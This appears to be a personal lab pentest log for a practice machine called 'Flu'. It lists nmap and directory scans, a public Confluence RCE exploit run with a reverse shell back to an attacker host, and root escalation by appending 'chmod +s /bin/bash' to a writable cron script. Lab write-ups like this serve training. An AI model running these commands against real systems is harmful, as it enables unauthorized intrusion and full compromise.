Flu

🧪 Pentest Log: {{date:2025-08-02}}

🔍 Target Information

Machine Name: Flu
IP Address: 192.168.230.41
Operating System: Linux

ip=192.168.230.41

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 8090

[Confluence](http://www.atlassian.com/software/confluence) 7.13.6

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

Port 8091

💣 Exploitation

📌 Vulnerability Summary

Service / Port: 8090
Vulnerability Type: RCE

🚀 Exploit Execution

🔧 Exploit Method

Manual
Public Exploit
Custom Script

Tool / Script Used:

https://github.com/jbaines-r7/through_the_wire

python3 through_the_wire.py --rhost $ip --rport 8090 --lhost 192.168.45.163 --protocol http:// --reverse-shell

🧬 Privilege Escalation

👤 Current Access

User: confluence
Groups: confluence
Shell Type: webshell

🔍 Enumeration

Scheduled Tasks

cat /etc/crontab

./pspy64

found /opt/log-backup.sh running by root every min and is writable by the current user

🔓 Privilege Escalation Exploit

📌 Exploit Summary

Technique Used: Scheduled Tasks
Target Binary/Service: log-backup.sh
Reference / Source: N/A

🔧 Exploit Steps

Smash to root

echo "chmod +s /bin/bash" >> /opt/log-backup.sh

bash -p